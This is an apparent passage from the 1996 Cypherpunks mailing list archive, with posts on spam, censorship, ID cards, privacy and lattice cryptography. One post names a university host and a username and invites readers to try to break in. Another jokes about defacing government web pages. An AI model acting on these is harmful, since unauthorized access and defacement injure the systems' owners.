running the net -- as though people in suits do better engineering
than the folks we've got. Metcalfe talks as though no one is trying to
fix the trouble. There already *are* people working hard trying to fix
the trouble, and they know a lot more than he does.

> > > When I run traceroutes, the blockage is in MCI or Sprintnet land.
> >
> > How do you manage to determine where you are losing bandwidth using
> > traceroute? That must be a mighty powerful traceroute to do that --
> > most traceroutes I've seen are hard pressed just to find out what the
> > connectivity path is.
> 
> Then you should probably upgrade your traceroute, preferably to one which
> allows source routing of the packets and then couple the output to a nice
> udp source routing script which will bounce a few packets between links
> with slow response times.

That doesn't tell you squat about bandwidth. At best, you can find a
really bad link that way, but there is no way to quantify the problem,
and no way to detect things like how much traffic is hitting that link.

The only way -- the ONLY way -- to determine link utilization from the
outside is with a management protocol like SNMP.

Perry




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Florian Lengyel <flengyel@dorsai.org>
Date: Sun, 8 Sep 1996 01:44:06 +0800
To: frogfarm@yakko.cs.wmich.edu
Subject: Re: Court challenge to AOL junk-mail blocks
In-Reply-To: <199609071350.JAA20470@yakko.cs.wmich.edu>
Message-ID: <3231BF59.773C@dorsai.org>
MIME-Version: 1.0
Content-Type: text/plain


Damaged Justice wrote:
> 
> > > This is utter horseshit. AOL, like any private individual or organization,
> > > has the right to refuse service to anyone at any time for any reason, or
> > > even for no reason at all.
> >
> > That seems to undermine the analogy that the Internet is like an immense
> > electronic postal service, which suggests a more public than private
> > enterprise.
> 
> Perhaps that analogy held when the Internet was supported with money taken
> at gunpoint from all us tax serfs. No more - you wanna play, you gotta pay.
> Which is as it should be.
> 
> [snip]
> 
>  >Unlike the people who donate their time and
> > resources to the Internet out of goodwill, and who may set arbitrary
> > limits on the services
> > they provide, in my experience, out of bad will, and who cannot be so
> > easily
> > removed, a corporation's business can suffer if it doesn't provide
> > services.
> 
> If their business suffers because of a decision, they may reconsider that
> decision. If they don't, they'll either survive, or they won't, depending
> on if their customers will stand for it. 

My point exactly

I fail to see why charging money
> for the services one provides suddenly transforms a person into a slave,
> forced to provide service even if they do not wish to do so. 

Non-sequiteur.

Do you feel
> that providing a service for free is more "noble", somehow, and therefore
> more "worthy" of protection?

Non-sequiteur.
> 
> > One of the good things about the commercialization of the Internet is
> > that
> > you can fire those who, instead of providing a service, are busy
> > exercising arbitrary rights to refuse services unfairly or for no reason
> > whatsoever.
> 
> Who is going to "fire" a company that provides a service? The gubmint is
> your only alternative; the gun of the law, your only tool.

You provide the answer that I had in mind:
> 
> If you don't like your ISP, get a different one. Spammers do it all the
> time. 

> People are whining all over the place about "exercising arbitrary
> rights", as if it were eeeeevil when companies do it. Get a grip. 

Non sequiteur. You're not responding to my point, which is a moral 
criticism of the tone of statements like 

> > > any private individual or organization,
> > > has the right to refuse service to anyone at any time for any reason, or
> > > even for no reason at all.

which seem to oversimplify matters for corporations like AOL. Of course
AOL
can repeat statements like these to its customers until it was blue in
the 
face, but the good news is that their customers could vote with their
feet. 
My criticism of your statement is that it an aethetically ugly and
hippocritical position to take, if one purports to provide mail services 
to hundreds of thousands of customers, or purports not to engage in 
editorial control, or purports to promote free speech. If ISP's want
to provide services subject to arbitary limitations fine ... I am
stating that
I find this practice deplorable, and I have not implied that I favor
government
regulation to correct such situations, as much as you want to believe
that I have.

> If a company kicks a spammer off their system, what recourse do you
> want them to have, other than their right to "vote with their feet" and
> find a different provider? 

None.

> It seems you would find it favorable for them
> to go whining to the gubmint: "Waaah! He kicked us out of his treehouse!
> You go beat 'em up and make 'em take us back!"

That's an overinterpretation of my words.

> If they can seize John Adams' yacht, they can seize your beat-up old car.
> If they can force XYZ Corp to provide access, they can force anyone to
> do anything, and there is no grounds for complaint. After all, universal
> access must be provided! A chicken in every pot, and a router in every
> garage! Right?

Non sequiteur.
> 
> > >The gubmint isn't doing SQUAT, except forcing
> > > AOL to allow the spammers access.
> >
> > Since I reject the flat assumption that corporate ISP's have the same
> > freedom as private individuals to set limits on the internet services
> > they provide  - in this case their freedom to act is limited by business
> > constraints - it's fair to ask why it's morally OK for ISP's to censor
> > junkmail, but if the government wants to step in, that's another
> > matter entirely.
> 
> Because only the gummint can "censor". Whatever anyone else does is NOT
> censorship, unless you want to redefine words to suit your pleasure. It
> is exercising judgment and taste. Whether you find that judgment acceptable
> or not is not an excuse to impose your judgment on others at gunpoint.

What dictionary do you use?
 
> > I'm not in favor of the government stepping in, but I am in favor of
> > some consequences of the commercialization of the internet. A bad
> > consequence is the increased volume of junkmail. A good consequence
> > is the possibility of removing people who act as arbirary censors
> > of other people's mail or speech, who invoke their rights as private
> > individuals to regulate the services they provide for any reason
> > whatsoever, while they hold their government to a higher standard
> > of conduct, and even seek the protection of their government to
> > act like petty dictators.
> 
> Pot. Kettle. Black.

I see you've looked in the mirror recently :) 
> 
> --
> http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
> why the dancing shouting   why the shrieks of pain  the lovely music  why the
> smell of burning autumn leaves     working on the tiny blueprint of the angle
> I must be silent must contain my secret smile  you my mirror you my iron bars

F Lengyel	flengyel@dorsai.org	http://www.dorsai.org/~flengyel




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Vladimir Z. Nuri" <vznuri@netcom.com>
Date: Sun, 8 Sep 1996 05:46:01 +0800
To: tcmay@got.net (Timothy C. May)
Subject: Re: Junk Phone Calls, Metered Usage, and Cellphones
In-Reply-To: <ae55ca940302100440b2@[207.167.93.63]>
Message-ID: <199609071839.LAA12411@netcom3.netcom.com>
MIME-Version: 1.0
Content-Type: text/plain



TCM:

>Relevance to Crypto? The "junk e-mai" issue, calls for regulations (which
>I'm against), technological solutions (Caller ID lets users decided to
>accept a call or not....same idea could be used with e-mail, a la Hal
>Finney's "You have a message of size X from size Y entitled Z" proposal for
>positve acceptance of remailed messages), and the value of True Names (and
>True Numbers).

more and more I think the problem of "junk info" which we keep running
into on this list is of key importance
to future information technologies. loosely translated, I would call
this the same problem that rears its head in many different information
transfer formats. spam in newsgroups, junk mail in the email box, 
sales calls on the phone. can it be solved? caller ID is in one sense a
solution to this problem. I suspect we will be seeing increasingly
sophisticated solutions.

in short, imagine a communication system with various entities.
this could be a newsgroup, a phone system, an email system, etc.

the fundamental problem is allowing the transfer of information that
is "approved" by consenting parties, and rejecting the transfer
of information (and preventing denial-of-service attack) for 
anything otherwise.  a very tricky problem, because the value
of information is subjective in the eyes of sender and receiver,
and often people want to receive information and cannot tell whether
they want it or not until they see it.

for cpunks, there are additional goals. ideally pseudonymous 
communication or anonymous communication would be allowed.

for the phone problem, one possible way of solving this is to
have passwords. in addition to giving out your cell phone number,
you give the person a digital password. you are free to vary this
password yourself for multiple entities. they have to enter the
right password for the call to go through (or for any charges
to accrue). if you get junk calls, you at least know the individual
password that was "compromised". you can reject that password
in the future as being "dirty" and hand out a new password via
your trusted channels to anyone who tells you they can't get
through to you any more (and you don't necessarily want that
to stay that way <g>).

this system is remarkably similar to the way that intelligence
agencies work, with their agents and spies. they deal with the 
problem of knowing which channels have been "compromised" and
working with countermeasures. in fact I suspect
that the intelligence community has developed very sophisticated
ways of dealing with information transfer and "spoofing" (bad data so
to speak) that might have major applications to the design of future 
cyberspace.

such a system could be applied to email. I send out email passwords
to my trusted associates (they might even be included in the email
address itself). email that doesn't have a proper password I could
either delete or put into the "low priority" bin. unfortunately
this restricts email whereas one of the great aspects of email
is its lack of controls and preventions in contacting people.

but notice that one could still have a lot of relative freedom
in this system. suppose that I gave a lecture to a large audience
of people. I could then create a new password for that audience,
and release it to them. if I get email under that password, I know
it was somehow from someone in that audience, and it would be
worth more to my attention, so to speak, than junk email. it has
slightly more value than being totally "out-of-the-blue anonymous". 
if the address became too popular, or got into the hands
of a marketer, I could hook it up to a form
letter or disconnect it.

in a sense this would be like something like having the ability 
to create or disconnect multiple phone numbers whenever you want.
I suspect such systems will become more prevalent in the future.
whenever you interface with other people, you will be given
the opportunity to put it under your own personal "information
channel" of choice. "inquiries on this subject should be addressed
to [x]".

a similar mechanism is used by advertisers to gauge the efficacy
of their advertising. they say in the ad, "mention this ad to
get [x]". this is setting up an independent information channel
for identification. they also might set up a separate phone 
number for a given advertisement, and see how much traffic they
get through that phone number independently. all this is
invisible to the customer.

the "junk info" problem becomes much more difficult to solve
with public forums such as newsgroups, and the above approach
would not seem to apply.

others have proposed solutions that are related to packaging
money in messages. "I will pay you 5 cents to read this message"
which can be collected upon opening it. a very interesting
proposal I think we will see actually put into practice.

I suspect we will continue to see interesting innovations that
focus on the problems of information dissemination. it's amazing
how far we are into the information age without some key
problems being solved yet. plenty of room for some innovative
thoughts. I continue to believe there are some elegant solutions
waiting to be found. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "<pstira@escape.com>" <pstira@escape.com>
Date: Sun, 8 Sep 1996 02:32:24 +0800
To: Gary Howland <gary@systemics.com>
Subject: Re: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL
In-Reply-To: <32316455.794BDF32@systemics.com>
Message-ID: <Pine.BSI.3.91.960907114344.23857B-100000@escape.com>
MIME-Version: 1.0
Content-Type: text/plain



Gosh, I'm not a German citizen, and don't even have a nickel's worth of 
german blood in my body, but who will be the first to add some real 
pretty pixtures and some snazzy ol' text adages to THEIR governments' web 
pages?

Life needs more risk.  If we ever EVER hope to establish any sort of 
DISestablishment, it only starts with us.  Well, you.  As I said, I'm not 
German (and quid pro quo, and stuff like that).

;)
Millie
sfuze@tiac.net

PS: Why not mirror it on their own sites? ;)

On Sat, 7 Sep 1996, Gary Howland wrote:

> Timothy C. May wrote:
>  
> > * as Germany is bent on blocking sites which carry this subversive
> > pamphlet, "Radikal," let us mirror it on thousands of sites around the
> > world.
> 
> Agreed - put them in a dilemna by getting mirrors on machines obviously
> important and useful to the Germans.
> 
> > * when the Germans went into Danmark and insisted Jews wear badges,
> > ordinary citizens (and the Danish Royal Family, as I recall) also took to
> > wearing these Star of David badges.
> 
> Bad example.  Jews living in Denmark were not required to wear yellow
> stars.  The story about the Danish royal family wearing the stars is an
> urban legend, spread by the British to make the Danish King appear to be
> less of a coward after he fled to England.
> 
> Gary
> --
> "Of course the US Constitution isn't perfect; but it's a lot better
> than what we have now."  -- Unknown.
> 
> pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
> Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06
> 
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sat, 7 Sep 1996 21:53:15 +0800
To: cypherpunks@toad.com
Subject: IDC_ard
Message-ID: <199609071146.LAA06846@pipe1.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-8-96. NYP Mag: 
 
   "The True Terror Is In the Card." 
 
      Faced with rising crime, illegal immigration, welfare 
      fraud and absentee parents, many bureaucrats and members 
      of Congress insist that the nation would run more 
      smoothly if we all had counterfeit-proof plastic 
      identity cards. 
 
      Let's be clear that this is a one-way street. Once 
      having established a requirement to carry photo ID, it 
      will be difficult if not impossible to reverse. 
 
      Don't we realize the dangers of allowing the Government 
      to establish identity and legitimacy? Isn't it, in fact, 
      the responsibility of the citizenry to establish the 
      legitimacy of the Government? 
 
   ----- 
 
   http://jya.com/idcard.txt  (11 kb) 
 
   IDC_ard 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Roger Williams <roger@coelacanth.com>
Date: Sun, 8 Sep 1996 02:37:40 +0800
To: cypherpunks@toad.com
Subject: Re: What is the EFF doing exactly?
In-Reply-To: <199609071340.JAA03365@nrk.com>
Message-ID: <rogerg24uqn33.fsf@sturgeon.coelacanth.com>
MIME-Version: 1.0
Content-Type: text/plain


>>>>> David Lesher <wb8foz@nrk.com> writes:
  > Duncan Frissell sez:
  >>  >Try and pay cash in most Fedex offices.
  >> 
  >> Buy money order.  Slip it into the plastic pouch with the
  >> airbill.  Drop it into collection box.  Works.

For that matter, I've never had a problem using exact change in the
airbill pouch, either.

  > But then the cameras at the Post Office will get you...

Aha, I see your problem, David -- you've been trying to mail FedEx
parcels from the Post Office (that trick *never* works).

Seriously, I haven't seen many cameras aimed at street-corner FedEx
drop boxes.

-- 
Roger Williams                         finger me for my PGP public key
Coelacanth Engineering        consulting & turnkey product development
Middleborough, MA           wireless * DSP-based instrumentation * ATE
tel +1 508 947-8049 * fax +1 508 947-9118 * http://www.coelacanth.com/





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jim bell <jimbell@pacifier.com>
Date: Sun, 8 Sep 1996 06:05:05 +0800
To: "Rev. Mark Grant" <jleonard@divcom.umop-ap.com>
Subject: Re: MUD anyone?
Message-ID: <199609071920.MAA08949@mail.pacifier.com>
MIME-Version: 1.0
Content-Type: text/plain


At 10:06 AM 9/1/96 +0000, Rev. Mark Grant wrote:
>On Tue, 27 Aug 1996, Jon Leonard wrote:
>Protection Agencies
>Escrow Agencies
>Private Law Courts (probably controlled by players rather than the computer)
>Reputation Agencies
>
>> What am I missing?  Should there be direct support for Jim Bell's
>> assasination markets?  It'd provide a means of demonstrating its
>> ineffectiveness as a means of social control.
>
>I think it should be incorporated, but I think that people can set them up
>easily themselves. Perhaps we should have an NPC-run 'Assasins Inc' which
>would run the lottery, and then players could do the actual 'wet work'. 
>
>But yes, I'd really like to see how this would work in the game. As I 
>said I'm thinking of this more as a semi-scientific experiment than a 
>pure game. We have some idea of how this stuff should work in theory, but 
>little of how it works in practice.
>
>I do think though that we'd have to enforce some kind of rule against
>'disposable characters', otherwise people could simply create a new
>character every time they were killed trying to assasinate someone. There
>would need to be some disadvantage to just going in guns-blazing and being
>killed ten times in a row. 

Wouldn't it be more realistic if instead of representing individual 
characters, you created composites which had a "weight" based on how many of 
them exist in the country/world?  For example, the character "buggy-whip 
maker" in 1900 would be weighted in the thousands, while his number would be 
drastically reduced a few decades later.

This would avoid the "going in with guns blazing" scenario, or at least it 
would put it into perspective:  the number of assassins would drop by "1" 
(or some proportion) if that happened, although correspondingly the number 
of targets would also drop. 

With this system, a character would never die, but his number would simply 
drop to an insignificant quantity. ("Government-thugs" comes to mind...)   
And that's not the only reason the number of characters would drop:  If it 
suddenly became "unhealthy" to accept a public paycheck, and thus the risk 
wasn't matched by the rewards, presumably people would shift professions.  
Again, this would all be part of the simulation. 



Jim Bell
jimbell@pacifier.com




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Declan McCullagh <declan@eff.org>
Date: Sun, 8 Sep 1996 06:04:23 +0800
To: Damaged Justice <frogfarm@yakko.cs.wmich.edu>
Subject: Re: Court challenge to AOL junk-mail blocks
In-Reply-To: <199609070316.XAA13685@yakko.cs.wmich.edu>
Message-ID: <Pine.SUN.3.91.960907122225.13569J-100000@eff.org>
MIME-Version: 1.0
Content-Type: text/plain


If AOL wants to stop spammers, let them. They have every right to do so as
long as their agreement with their customers permits it. It's a matter of
contract law between AOL and its customers and should not involve the
spammers and a lawsuit brought by the spammers.

It seems as though the judge was snookered by the spammers' claim of U.S. 
Mail-like service, free speech, blah. The right to free speech does 
extend to corporations; in that way, it includes the right *not* to speak.

-Declan


On Fri, 6 Sep 1996, Damaged Justice wrote:

> 
> This is utter horseshit. AOL, like any private individual or organization,
> has the right to refuse service to anyone at any time for any reason, or
> even for no reason at all. The gubmint isn't doing SQUAT, except forcing
> AOL to allow the spammers access.
> 
> --
> http://yakko.cs.wmich.edu/~frogfarm ...for the best in unapproved information
>       Hey, Bill Clinton: You suck, and those boys died! I hope you die!
>  I feel a groove comin' on             $              Freedom...yeah, right.
>  
> 


// declan@eff.org // I do not represent the EFF // declan@well.com //






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Brothers <johnbr@atl.mindspring.com>
Date: Sun, 8 Sep 1996 03:40:36 +0800
To: cypherpunks@toad.com
Subject: Re: Metcalf and Other Net.Fogies
Message-ID: <1.5.4.32.19960907164630.006d211c@pop.atl.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


At 11:17 AM 9/7/96 -0400, perry@piermont.com wrote:
>
>  <snip discussion of internet collapse>
>
>I'm "involved with the problems" too, you know. Don't teach granpaw to
>suck eggs. OF COURSE there are problems. None of them, however, are
>signs of "collapse".

This whole thing makes me ill - maybe I'm just an idiot.   What could
possibly cause a collapse?   More usage??  No - that would just mean that
everyone's access would be slower.  Do routers fail because they can't talk
to other routers?  no - they route around it.  I consider myself reasonably
educated when it comes to the layout of the internet, and I have never heard
_anyone_ ever say what constitutes a collapse, and, if it means
'catastrophic permanent failure of the Internet', what could possibly cause
that.

These people are acting like one day, something is going to blow up, and
the entire internet will follow, and stay down for a long long time.

If all the DNS servers died, the internet would stop working for non-local
access until they recovered.  If there was a bug in Cisco routers that
was set to go off on Thursday, September 12th, that would render them
inoperable until power cycled, that would cause a major failure.  If
every building in MCI and Sprint's data network blew up, that would cause
a major failure.

If the usage increased so that the Internet was 'saturated', that doesn't
qualify as a collapse.  It qualifies as 'rush hour'.  If the internet was
in 'rush hour' 24 hours a day, it would be unfun to use, but unlike the
highway system, we can add more lanes pretty much at will. (within reason).

Will someone please explain to me what I'm missing?

Thanks
  John


---
John Brothers 
   Do you have a right not to be offended?





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Choate <ravage@einstein.ssz.com>
Date: Sun, 8 Sep 1996 03:58:38 +0800
To: cypherpunks@toad.com
Subject: Re: "The Bill of Rights can be dangerous...." (fwd)
Message-ID: <199609071749.MAA01561@einstein>
MIME-Version: 1.0
Content-Type: text



Hi all,

Forwarded message:

> Subject: Re: "The Bill of Rights can be dangerous...."
> From: dlv@bwalk.dm.com (Dr.Dimitri Vulis KOTM)
> Date: Sat, 07 Sep 96 09:35:38 EDT
>
> I remember beig surprised to discover that the library computer at City
> University of New York (state school where I got all my degrees) had an
> (easily accessible) record of every book I've ever checked out in some
> 15 years, And by the way you need to present A LOT of ids to take books
> out of New York's public libraries, or to use the public-access
> computers in them. And by the way you're asked to sign your name and
> affiliation (fortunately, no ID is required) if you want to just enter
> NYPL's Slavic division and use their reading room. Apparently this was
> instituted during the cold war under the assumption that anyone
> interested in Slavic Division's materials needs to be watched.

In the very early 80's while I was attending UT Austin the FBI approached
the libraries and requested access to the loan records. The libraries
refused and went so far as to post a warning at each of the book checkout
points on the event.

Personaly, I was very proud of them for the refusal and the extra step
of the warning.

> A very good friend of mine does EE for a living, and in particular he
> sells some EE equipment by mail order. He told me that every time he
> sells something like the gizmo to write magnetic strips on credit cards,
> he gets a phone call from los federales saying: you sold X who paid with
> Y and shipped it to address Z - do you have any additional details? He
> says every time they know as much about the sale as he does. :-)

I have been dealing with security electronics for over 10 years and have
never been approached by anyone regarding my activities. I make no secret of
the fact that I do that sort of work as well as being able to build custom
equipment if needed. I would suspect that there is a flag on your friend
for something or someone from the past, not on his business in particular.

                                                  Jim Choate
                                                  CyberTects
                                                  ravage@ssz.com





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: roy@sendai.scytale.com (Roy M. Silvernail)
Date: Sun, 8 Sep 1996 05:12:29 +0800
To: jbugden@smtplink.alis.ca
Subject: Re: Anonymous phone calls (was: What is the EFF doing exactly?)
In-Reply-To: <9608068420.AA842029748@smtplink.alis.ca>
Message-ID: <960907.130338.3j4.rnr.w165w@sendai.scytale.com>
MIME-Version: 1.0
Content-Type: text


-----BEGIN PGP SIGNED MESSAGE-----

In list.cypherpunks, jbugden@smtplink.alis.ca writes:

> There is another spin possible on the reasons for replacement of
> pay phones with credit card phones. In Canada all new credit card
> phones are also able to take phone cards (which are anonymous).
>
> Using a prepaid phone card permits full anonymity. But what it also
> permits is metered local calls. This infrastructure would be more
> familiar to someone  from Europe where metered local calls are the
> norm.

In Minneapolis, USWest has Telecard phones everywhere, and vending
machines with bill accepters.  The calls are also flat rate at $0.25.
Beware using the Telecard for a long distance call.  I did one from
Seattle to Mpls and it was something like $3.65 for the initial charge.

Can Telecards be audited for usage?  If a TLA black-bags my $25 Telecard
from my wallet, can they reconstruct what calls I made with it?
- -- 
           Roy M. Silvernail     [ ]      roy@scytale.com
PGP Public Key fingerprint =  31 86 EC B9 DB 76 A7 54  13 0B 6A 6B CC 09 18 B6
                Key available from pubkey@scytale.com

-----BEGIN PGP SIGNATURE-----
Version: 2.6.2

iQCVAwUBMjG5+Rvikii9febJAQFccwP+IUT/jAzygglq6L9HoMc1/j7JvMi/LpZP
bNB0fGpJxP1xtQw+T3lsGwDo6ZkbeUd2H+k8sbZMagcQ2kzc2JIoyf5PEbKNgdTc
kCHuwaSU7xHy/GOasfjy97VV4vd4ctqwxwGiKwi6Bc6UROjl8Ts8cLVQmsQC/JXl
OU2Gvj1iB0k=
=KrXb
-----END PGP SIGNATURE-----





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sun, 8 Sep 1996 00:12:59 +0800
To: cypherpunks@toad.com
Subject: Lattice Crypto
Message-ID: <199609071338.NAA06648@pipe3.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   The Economist, September 7, 1996, p. 79. 
 
 
   Cryptography: Puzzling secrets 
 
 
   The truly paranoid have but one friend: mathematics. 
   Nothing (and nobody) else can be as trusted to keep a 
   secret. To transmit your credit card number, for example, 
   through an Internet full of thieves, the best way is to 
   hide it in a mathematical problem so excruciatingly 
   difficult that no thief could ever crack it, even by 
   hijacking all the world's computers for the effort. 
   Devising such problems is the business of cryptographers. 
 
   To be useful, the problems must be easy to create as well 
   as impossible to unravel. Multiplying numbers is very 
   easy. Taking the result and working out what numbers were 
   multiplied together to produce it (known as 
   factorisation) is a lot more difficult. It is not obvious 
   that 4,294,967,297 is the product of 641 and 6,700,417. 
 
   The two smaller numbers in this calculation are prime: 
   that is, neither can be factorised into two further 
   smaller numbers. The coding systems generally used by 
   governments, businesses and software companies such as 
   Netscape (known as RSA encoding schemes, after Ronald 
   Rivest, Adi Shamir, and Leonard Adleman, who invented the 
   idea in 1977), mix a number even huger than 4,294,967,297 
   into a message, and then churn it in such a way that only 
   the number's prime factors can undo the mess. The big 
   number is used to make a "public key" (each user has his 
   own, but it is available to those who might wish to 
   communicate with him). The two prime factors compose a 
   private key, guarded carefully by their owner. 
 
   The trouble is that nobody is absolutely sure how safe 
   this scheme is. At present a public key that was 400 
   digits long would take existing computers longer than the 
   age of the universe to crack. But it remains to be proved 
   in a rigorous mathematical way that no systematic 
   short-cut exists. Indeed, some types of numbers are easy 
   to factorise, and RSA schemes must avoid these known 
   softies. It may yet turn out that, even if factorising is 
   hard in general (as mathematicians suspect, after 
   centuries of trying), there is a sneaky way, in the case 
   of some other types of numbers, to do it quickly. 
 
   This would be bad luck if you chose such a number. 
   Private users may not care much: it is unlikely that 
   someone who discovered such a loophole would use it for 
   anything so modest as unscrambling credit card numbers. 
   But governments, whose secrets are worth a lot more, are 
   always on the lookout for better cloaks to go with their 
   daggers. The ultimate cryptographic feat would therefore 
   be a mathematical proof that all choices of a particular 
   problem useful in code-making are forever intractable. 
 
   Nobody is that clever yet. But Miklos Ajtai, a 
   mathematician at the IBM Almaden Research Centre in San 
   Jose, California, has made progress with puzzles called 
   "lattice reductions". If you pick any such problem using 
   his guidelines, it is -- unlike a factorisation problem 
   -- guaranteed to be just as thorny as the most difficult 
   one imaginable. Since many mathematicians also suspect 
   that the toughest lattice-reduction problem is almost 
   impossible to crack, Dr Ajtai's proof, completed in May, 
   increases the confidence that they would all make good 
   wrappings for secret messages. 
 
   For mathematical aesthetes, lattice problems have more 
   panache than the dull numerals of factorisation. Instead 
   of factorising, say, a 200-digit number, a lattice 
   reduction invites the would-be codebreaker to deduce the 
   most basic way a pattern repeats itself in a piece of 
   200-dimensional decorative wallpaper. This is every bit 
   as hard as it sounds. 
 
   To describe a repeating pattern of rows and columns of 
   flowers on an ordinary piece of wallpaper, two "arrows" 
   suffice. Each points from one flower to a nearby one. If 
   you start with a wall which is blank, except for one 
   flower, you can reconstruct the entire design with the 
   arrows: lay the ends of the arrows on the flower and draw 
   new flowers (with new arrows) at each arrowtip. Repeat 
   the process with the new flowers and the wall will 
   eventually be full. 
 
   Although the obvious pair of arrows to choose in this 
   case would be at right angles to each other (eg, pointing 
   north and east) other pairs would also work: for example 
   north-east and east. But in this case the "north-east" 
   arrow would have to be longer to reach the centre of the 
   next flower than the "east" one. The puzzle is to find 
   the shortest set of arrows that can be used to replicate 
   the pattern -- easy in two or three dimensions, but 
   achingly complex in the higher-dimensional spaces that 
   the imaginations of mathematicians inhabit. By the time 
   the pattern has 200 dimensions, today's fastest computers 
   would be unable to find the 200 smallest arrows 
   describing an arbitrary pattern before the sun ran out of 
   fuel. Yet, as with two prime numbers, it is easy to begin 
   with those arrows and produce the design. 
 
   But how do you hide a secret message, accessible only 
   with a private key, in a publicly available lattice? 
   Shafi Goldwasser, Oded Goldreich and Shai Halevi, of the 
   Massachusetts Institute of Technology and the Weizmann 
   Institute, in Israel, have just proposed a way. In order 
   to encode a line of digits, they first interpret them as 
   coordinates for a point in the lattice. Then they mix up 
   the numbers by nudging that point a tiny random amount 
   into the empty space between lattice points. To retrieve 
   the original number, an eavesdropper would need to find 
   the way back to the nearest lattice point, which is 
   almost -- but not quite equivalent to knowing its 
   shortest arrows. 
 
   The trouble with it being not quite equivalent is that 
   the encoding scheme changes the problem slightly -- 
   enough for it to fall just outside the range of Dr 
   Ajtai's proof that any instance of his lattice scheme is 
   as hard to solve as the most difficult one. 
 
   There is hope that the proof can be extended to include 
   the encryption scheme, or that the scheme can be modified 
   to fit the proof. But a proof that nobody could ever 
   invent a quick method to solve the toughest lattice 
   reduction would be nicer still -- except that its 
   inventor would put fellow code-breakers out of work. A 
   cryptographer who invented such a system might well be 
   tempted to keep it secret. 
 
   [Graphic of wallpaper omitted] 
 
   [End] 
 
 
 
 
 
 
 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Gary Howland <gary@systemics.com>
Date: Sat, 7 Sep 1996 22:23:06 +0800
To: "Timothy C. May" <tcmay@got.net>
Subject: Re: PRESS RELEASE: GERMANY CENSORS DUTCH WEBSITE WWW.XS4ALL.NL
In-Reply-To: <ae55ae08020210048be5@[207.167.93.63]>
Message-ID: <32316455.794BDF32@systemics.com>
MIME-Version: 1.0
Content-Type: text/plain


Timothy C. May wrote:
 
> * as Germany is bent on blocking sites which carry this subversive
> pamphlet, "Radikal," let us mirror it on thousands of sites around the
> world.

Agreed - put them in a dilemna by getting mirrors on machines obviously
important and useful to the Germans.

> * when the Germans went into Danmark and insisted Jews wear badges,
> ordinary citizens (and the Danish Royal Family, as I recall) also took to
> wearing these Star of David badges.

Bad example.  Jews living in Denmark were not required to wear yellow
stars.  The story about the Danish royal family wearing the stars is an
urban legend, spread by the British to make the Danish King appear to be
less of a coward after he fled to England.

Gary
--
"Of course the US Constitution isn't perfect; but it's a lot better
than what we have now."  -- Unknown.

pub  1024/C001D00D 1996/01/22  Gary Howland <gary@systemics.com>
Key fingerprint =  0C FB 60 61 4D 3B 24 7D  1C 89 1D BE 1F EE 09 06




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jfricker@vertexgroup.com (John F. Fricker)
Date: Sun, 8 Sep 1996 07:42:40 +0800
To: cypherpunks@toad.com
Subject: Re: What the NSA is patenting
Message-ID: <2.2.32.19960907212748.00ada824@vertexgroup.com>
MIME-Version: 1.0
Content-Type: text/plain


At 02:03 PM 9/6/96 -0700, you wrote:
>At 12:50 AM 9/7/96, Jean-Francois Avon wrote:
>>A maybe usefull program would be a little tsr that constantly
>>overwrite unused sectors of the entire drive with random patterns
>>(maybe seeded with a fast keyboard interval timer).  Like at the very
>>moment I am writing this, my HD has been idle for several minutes...
>>
>
>
>The NSA STM method is related to reading _very subtle_ variations in
>magnetic domain modifications. Jitter in read-write head positions can be
>thought of as a noise (N) added to some signal (S)l. Extraction of signals
>in low S/N ration environments is a well-developed science.
>

This excerpt from a Wired article/interview
http://www.hotwired.com/wired/3.10/departments/electrosphere/data.html

"No data is totally safe," says Sharp, who runs his Data Recovery Labs from
the coincidentally named town of Safety Harbor,
Florida. "But you can recover data that's been overwritten up to nine times.
The only way to permanently remove data is with
programs that can do a 'severe security erase,' when the drive is
over-written 10 consecutive times." 


Believe it or don't!





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Kermit69 <kermit69@10mb.com>
Date: Sun, 8 Sep 1996 05:17:45 +0800
To: cypherpunks@toad.com
Subject: Have at it. Username provided
Message-ID: <3231C53E.21B4@10mb.com>
MIME-Version: 1.0
Content-Type: text/plain


Hey. Try this, whitman.gmu.edu a username = myost




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: jya@pipeline.com (John Young)
Date: Sun, 8 Sep 1996 01:45:27 +0800
To: cypherpunks@toad.com
Subject: ASP_oil
Message-ID: <199609071500.PAA11688@pipe3.t1.usa.pipeline.com>
MIME-Version: 1.0
Content-Type: text/plain


   9-7-96. FiTi: 
 
   "Indian herb trick turns water into kerosene." 
 
      A young, unemployed south Indian has flummoxed India's 
      top government scientists by demonstrating an apparently 
      simple recipe for producing a kerosene-like fuel by 
      boiling a "mystery" herb in water: prospectively, he 
      hopes, revolutionising the world energy industry. 
 
      "We have no doubt we are sitting on something very big," 
      said Mr Valangiman Ramamurthi, India's top science 
      bureaucrat. Watching scientists professed little idea 
      how or why the process worked, but said it conclusively 
      produced "a clear oil separation in substantial 
      quantities" which tests have identified as a hydrocarbon 
      similar to kerosene. "Its properties make it better than 
      petrol," said one. "Apparently the herb can grow widely 
      in all types of soil -- it is very exciting." 
 
   9-7-96. WaPo: 
